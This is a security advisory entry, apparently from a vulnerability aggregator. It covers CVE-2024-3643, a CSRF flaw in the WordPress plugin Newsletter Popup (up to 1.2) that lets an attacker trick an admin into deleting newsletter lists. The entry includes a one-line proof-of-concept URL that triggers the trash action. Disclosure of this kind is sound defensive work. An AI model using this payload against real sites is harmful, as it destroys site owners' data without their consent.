Lucene search
Bob MatyasWPVDB-ID:698277E6-56F9-4688-9A84-C2FA3EA9F7DCHistoryApr 25, 2024 - 12:00 a.m.
Newsletter Popup <= 1.2 - List Deletion via CSRF
2024-04-2500:00:00
Bob Matyas
wpscan.com
3
csrf
attack
admins
deletion
Description The plugin does not have CSRF check when deleting list, which could allow attackers to make logged in admins perform such action via a CSRF attack
PoC
Make an admin open a URL (where `` is a valid id): http://example.com4/wp-admin/admin.php?page=wp_newsletter_show_items&action;=trash&id;=
Related
nvd
nvd
CVE-2024-3643
2024-05-16 06:15:10
cve
cve
CVE-2024-3643
2024-05-16 06:15:10
cvelist
cvelist
CVE-2024-3643 Newsletter Popup <= 1.2 - List Deletion via CSRF
2024-05-16 06:00:02
wpexploit
wpexploit
Newsletter Popup <= 1.2 - List Deletion via CSRF
2024-04-25 00:00:00
Newsletter Popup <= 1.2 - List Deletion via CSRF
2024-04-25 00:00:00
vulnrichment
vulnrichment
CVE-2024-3643 Newsletter Popup <= 1.2 - List Deletion via CSRF
2024-05-16 06:00:02
AI Score
6.4
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPVDB-ID:698277E6-56F9-4688-9A84-C2FA3EA9F7DC